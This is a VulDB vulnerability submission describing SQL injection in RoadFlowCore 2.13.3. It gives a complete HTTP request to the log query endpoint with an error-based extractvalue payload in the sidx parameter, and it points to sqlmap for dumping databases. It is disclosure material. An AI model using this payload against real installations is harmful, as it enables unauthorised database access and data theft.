Submit #164861: RoadFlow Engine SQL injection vulnerabilityinfo

TitleRoadFlow Engine SQL injection vulnerability
DescriptionFramework website:http://www.roadflow.net/ Version: Mvc version RoadFlowCore 2.13.3 1. Log in normally. Both sidx and sord are injected in the login log. Use the following package to obtain the MD5 value Package: POST /RoadFlowCore/Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 HTTP/1.1 Host: 127.0.0.1:5000 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 176 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: RoadFlowCore.Session=CfDJ8EvfmoetFvtFn34qbL0bhQhVPICUIZe23FT2%2BIv4tgXIhxzHRz%2F40Qxji3lxMihNVkFthL5eQymhjNHVl0iqNPru%2BGfBizab4ZEB138hP%2BSOFYgXQP2tZPdu9qys%2BQbpYTh5Rwzh9BYk5K58xHmrlBc1uT9X%2FnXgia0rXV65atmq; .AspNetCore.Antiforgery.SqRQVSlQWbo=CfDJ8EvfmoetFvtFn34qbL0bhQj7IJMPHQg-LXLVAPIQvGhUcZ2CF80PZRkmgxvzMUXMLVI8GiG856YYTChSNe4Hgb1F5w5mjao2qYhx41IxJFI3KpMBYmIPwZ9GJP_B7wTBiYlE6WHtZRi5Vz-eMDmLOc8; rf_login_uniqueid=6AFBF013-A1F7-4E91-82AF-5844569B8F7A; rf_core_rootdir=; usermenutype=1; rf_core_theme=blue; roadflowcorepagesize=15 Origin: http://127.0.0.1:5000 Referer: http://127.0.0.1:5000/RoadFlowCore/Log/Index?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&rf_appopenmodel=0&tabid=tab_0B73635494734D66B9C015CAC149EB05 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin X-Requested-With: XMLHttpRequest Accept-Encoding: gzip _search=false&appid=0B736354-9473-4D66-B9C0-15CAC149EB05&nd=1685949526953&page=1&rows=20000&sidx=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281205948442%29%29%29&sord=desc 2、Run all databases using sqlmap
Source⚠️ http://www.roadflow.net/
User
 sadfsdfsdfsdf (UID 48119)
Submission06/05/2023 09:50 (3 years ago)
Moderation06/12/2023 16:36 (7 days later)
StatusAccepted
VulDB entry231230 [RoadFlow Visual Process Engine .NET Core Mvc 2.13.3 Login sidx/sord sql injection]
Points17

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!

n $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0'; } } ?>